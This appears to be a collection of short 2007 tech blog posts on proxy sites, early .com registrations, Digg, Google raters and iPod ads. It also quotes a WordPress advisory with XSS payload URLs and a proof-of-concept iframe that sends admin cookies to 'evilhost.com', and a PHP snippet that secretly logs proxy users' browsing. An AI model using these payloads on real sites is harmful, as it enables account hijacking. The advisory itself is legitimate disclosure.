PAGINASWEBGUADALAJARA.COM
PAGINASWEBGUADALAJARA.BIZ
PAGINASWEBGUADALAJARA.NET
PAGINASWEBGUADALAJARA.INFO
ONLQ.COM
JUSTIN-TIMBERLAKE.WS
MYSPACEE.INFO
MYSACE.INFO
… Oh yeah!
PAGINASWEBGUADALAJARA.COM
PAGINASWEBGUADALAJARA.BIZ
PAGINASWEBGUADALAJARA.NET
PAGINASWEBGUADALAJARA.INFO
ONLQ.COM
JUSTIN-TIMBERLAKE.WS
MYSPACEE.INFO
MYSACE.INFO
… Oh yeah!
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If you want to keep an eye on what your proxy visitors are seeing truth your proxy, just open index.php and add this:
After line 184:
function url_parse($url, & $container)
{
Add this:
$stuff = $_SERVER['REMOTE_ADDR'].”,”.$url.”\n”;
$fp = fopen(’log.txt’,”a”);
fwrite($fp,$stuff);
fclose($fp);
Now all the visited URL’s will be stored in a file called log.txt in CSV format
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I just launched a new proxy site for my network.
You got to admit, the domain name (http://unblock.it) is pretty amazing… In fact I’m getting thousands of visitors without any type of advertising whatsoever! They just keep coming and coming from different sites
I just love my new site ![]()
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1. 15-Mar-1985 SYMBOLICS.COM
2. 24-Apr-1985 BBN.COM
3. 24-May-1985 THINK.COM
4. 11-Jul-1985 MCC.COM
5. 30-Sep-1985 DEC.COM
6. 07-Nov-1985 NORTHROP.COM
7. 09-Jan-1986 XEROX.COM
8. 17-Jan-1986 SRI.COM
9. 03-Mar-1986 HP.COM
10. 05-Mar-1986 BELLCORE.COM
11. 19-Mar-1986 IBM.COM
11. 19-Mar-1986 SUN.COM
13. 25-Mar-1986 INTEL.COM
13. 25-Mar-1986 TI.COM
15. 25-Apr-1986 ATT.COM
16. 08-May-1986 GMR.COM
16. 08-May-1986 TEK.COM
18. 10-Jul-1986 FMC.COM
18. 10-Jul-1986 UB.COM
20. 05-Aug-1986 BELL-ATL.COM
20. 05-Aug-1986 GE.COM
20. 05-Aug-1986 GREBYN.COM
20. 05-Aug-1986 ISC.COM
20. 05-Aug-1986 NSC.COM
20. 05-Aug-1986 STARGATE.COM
26. 02-Sep-1986 BOEING.COM
27. 18-Sep-1986 ITCORP.COM
28. 29-Sep-1986 SIEMENS.COM
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30. 27-Oct-1986 ALPHACDC.COM
30. 27-Oct-1986 BDM.COM
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30. 27-Oct-1986 NEC.COM
30. 27-Oct-1986 RAY.COM
30. 27-Oct-1986 ROSEMOUNT.COM
30. 27-Oct-1986 VORTEX.COM
40. 05-Nov-1986 ALCOA.COM
40. 05-Nov-1986 GTE.COM
42. 17-Nov-1986 ADOBE.COM
42. 17-Nov-1986 AMD.COM
42. 17-Nov-1986 DAS.COM
42. 17-Nov-1986 DATA-IO.COM
42. 17-Nov-1986 OCTOPUS.COM
42. 17-Nov-1986 PORTAL.COM
42. 17-Nov-1986 TELTONE.COM
42. 11-Dec-1986 3COM.COM
50. 11-Dec-1986 AMDAHL.COM
50. 11-Dec-1986 CCUR.COM
50. 11-Dec-1986 CI.COM
50. 11-Dec-1986 CONVERGENT.COM
50. 11-Dec-1986 DG.COM
50. 11-Dec-1986 PEREGRINE.COM
50. 11-Dec-1986 QUAD.COM
50. 11-Dec-1986 SQ.COM
50. 11-Dec-1986 TANDY.COM
50. 11-Dec-1986 TTI.COM
50. 11-Dec-1986 UNISYS.COM
61. 19-Jan-1987 CGI.COM
61. 19-Jan-1987 CTS.COM
61. 19-Jan-1987 SPDCC.COM
64. 19-Feb-1987 APPLE.COM
65. 04-Mar-1987 NMA.COM
65. 04-Mar-1987 PRIME.COM
67. 04-Apr-1987 PHILIPS.COM
68. 23-Apr-1987 DATACUBE.COM
68. 23-Apr-1987 KAI.COM
68. 23-Apr-1987 TIC.COM
68. 23-Apr-1987 VINE.COM
72. 30-Apr-1987 NCR.COM
73. 14-May-1987 CISCO.COM
73. 14-May-1987 RDL.COM
75. 20-May-1987 SLB.COM
76. 27-May-1987 PARCPLACE.COM
76. 27-May-1987 UTC.COM
78. 26-Jun-1987 IDE.COM
79. 09-Jul-1987 TRW.COM
80. 13-Jul-1987 UNIPRESS.COM
81. 27-Jul-1987 DUPONT.COM
81. 27-Jul-1987 LOCKHEED.COM
83. 28-Jul-1987 ROSETTA.COM
84. 18-Aug-1987 TOAD.COM
85. 31-Aug-1987 QUICK.COM
86. 03-Sep-1987 ALLIED.COM
86. 03-Sep-1987 DSC.COM
86. 03-Sep-1987 SCO.COM
89. 22-Sep-1987 GENE.COM
89. 22-Sep-1987 KCCS.COM
89. 22-Sep-1987 SPECTRA.COM
89. 22-Sep-1987 WLK.COM
93. 30-Sep-1987 MENTAT.COM
94. 14-Oct-1987 WYSE.COM
95. 02-Nov-1987 CFG.COM
96. 09-Nov-1987 MARBLE.COM
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Microsoft allows large hardware manufacturers (e.g. ASUS, HP, Dell) to ship their products containing a Windows Vista installation that does NOT require any kind of product activation as this might be considered an unnecessary inconvenience for the end-user. Instead these so-called ‘Royalty OEMs’ are granted the right to embed certain license information into their hardware products, which can be validated by Windows Vista…
http://www.haklabs.com/2007/bypass-vista-activation-with-paradox/
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A vulnerability has been identified in WordPress, which could be exploited by attackers to execute arbitrary scripting code to compromise the admin account.
Here are some examples of arbitrary code execution:
http://somesite.com/wp-admin/comment.php?action=deletecomment&p=35&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://somesite.com/wp-admin/comment.php?action=deletecomment&p=39&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Here is a proof-of-concept code to steal the admin cookies:
<iframe width="0" height="0" src="http://somesite.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Eimage=document.createElement(%27img%27);image.src=%27http://evilhost.com/datagrabber.php?cookie=%27%2bdocument.cookie;%3C/script%3E%3Clol=%27"></iframe>
Solution:
http://trac.wordpress.org/changeset/4951
http://trac.wordpress.org/changeset/4952
Original advisory at seclists.org
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Here is something I found at SearchBistro.com a while ago:
What is it? It’s a lab of humans from all over the world (from China to The Netherlands, from Korea to Brasil) They are paid to check search results of Google every day. Most of the employees, called international agents by Google, were recruited through universities all over the world. The aim is to avoid spam, to get the right sites at the top of the listing and to test new features, not shown to the public yet.
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It seems that finally the Digg.com crew pleased some of their users by adding a photo preview. For the time being it seems that is only working for Flickr images… But still it’s pretty cool! Thanks for keeping your users pleased
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I was goofing around with Fiddler (HTTP Debugging Proxy) and I noticed something weird about the response headers from Digg.com. Take a look:
HTTP/1.1 200 OK
Date: Sun, 18 Feb 2007 05:11:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Encoding: gzip
Content-Length: 10657
As our friend Google would say…
Did you mean: Connection
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For all the iPod lovers out there like me, here is an amazing list of all the songs used in all the iPod ads:
http://www.macsupport.ca/2007/02/04/songs-from-ipod-commercials/
Pretty impressive!
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